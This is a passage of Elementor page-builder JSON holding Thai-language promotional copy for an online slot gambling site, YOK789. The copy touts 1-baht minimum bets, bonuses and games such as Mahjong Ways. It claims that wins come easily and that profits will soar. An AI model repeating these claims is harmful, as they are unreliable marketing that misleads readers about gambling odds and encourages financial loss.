400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c 